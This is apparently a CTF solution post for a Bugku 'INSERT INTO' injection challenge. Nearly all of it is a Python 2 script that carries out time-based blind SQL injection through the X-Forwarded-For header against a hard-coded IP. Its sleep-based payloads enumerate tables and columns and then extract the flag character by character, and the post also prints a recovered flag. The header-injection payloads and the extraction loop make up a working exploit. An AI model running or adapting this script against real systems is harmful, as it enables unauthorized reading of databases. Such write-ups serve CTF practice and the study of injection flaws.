bugku-INSERT INTO注入(附代码) 详细

# -*-coding:utf-8-*-
# author : wen
# flag:wen{b7bb30b3435f2e7c418b131f9e789f81}

import requests
import time

url = 'http://123.206.87.240:8002/web15/'
payload = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.{}'
data = ''

for i in range(1,40):
	for p in range(32,126):
		starttime = time.time()
		
		#XFF = u"1'and (select case when (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database())from %d for 1)) = %d) then sleep(4) else 1 end) and '1'='1" %(i,p)
		
		#XFF = u"1'and (select case when (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'flag')from %d for 1)) = %d) then sleep(4) else 1 end) and '1'='1" %(i,p) 
		XFF = u"1'and (select case when (ascii(substr((select flag from flag)from %d for 1)) = %d) then sleep(4) else 1 end) and '1'='1" %(i,p) 

		#127.0.0.1'+(select case when substr((select flag from flag) from 1 for 1)='a' then sleep(5) else 0 end))
		#print XFF
		headers = {'X-Forwarded-For':XFF}
		html = requests.get(url,headers=headers)
		if time.time() - starttime > 3:
			data += chr(p)
			print "i===="+str(i)+"\n p==="+str(p)
			print data
print "=================================>"
print "F L A G\n" + data